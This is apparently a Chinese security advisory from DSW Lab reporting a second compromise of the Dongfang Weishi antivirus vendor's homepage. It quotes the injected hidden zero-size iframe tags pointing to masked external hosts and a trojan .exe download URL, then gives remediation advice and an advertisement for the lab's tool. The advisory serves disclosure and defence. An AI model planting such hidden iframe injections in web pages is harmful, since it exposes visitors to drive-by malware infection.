今日,DSW Lab Avert小组监测到国内知名安全网站,东方卫士主页被挂木马,在东方卫士主页上,通过查看页面源代码,可以看到网页中被插入一条“< iframe src=”指令,该指令将隐藏打开一个新的页面,这个页面伪造了浏览器无法开的错误网页,并在后台隐藏打开三个页面,进行木马下载。
打开的隐藏页面代码:
<iframe src=http://www.****.cn/33/Reflector/index.htm width=0 height=0 frameborder=0></iframe>
在打开的伪造错误页面中会打开三个网页:
<iframe src="http://www.****.cn/33/Reflector/4.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.****.cn/33/Reflector/2.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"></iframe>
下载木马:
http://www.****.cn/33/Reflector/1.exe
解决方案:
1、推荐安装超级巡警监测查杀以上木马。
2、请广大用户及时升级系统补丁,预防更多的IE漏洞攻击。
3、为了最快保障广大用户不受木马侵害,在事件解决前请暂时不要访问东方卫士网站。
注:这是继我们上次报道该网站被挂马后第二次挂马。
关于东方卫士:交大铭泰信息安全公司,国内知名信息安全厂商,该公司提供《东方卫士》系列防病毒产品、数据保护、无毒网关产品、防垃圾邮件产品、网络设备及系统集成和 OEM 定制服务。
版权所有:数据安全实验室
超级巡警:彻底查杀各种木马,全面保护系统安全。
更多免费工具下载:http://www.dswlab.com
专业的桌面与内容安全产品:http://www.unnoo.com
Copyright(c) DSW Lab All rights reserved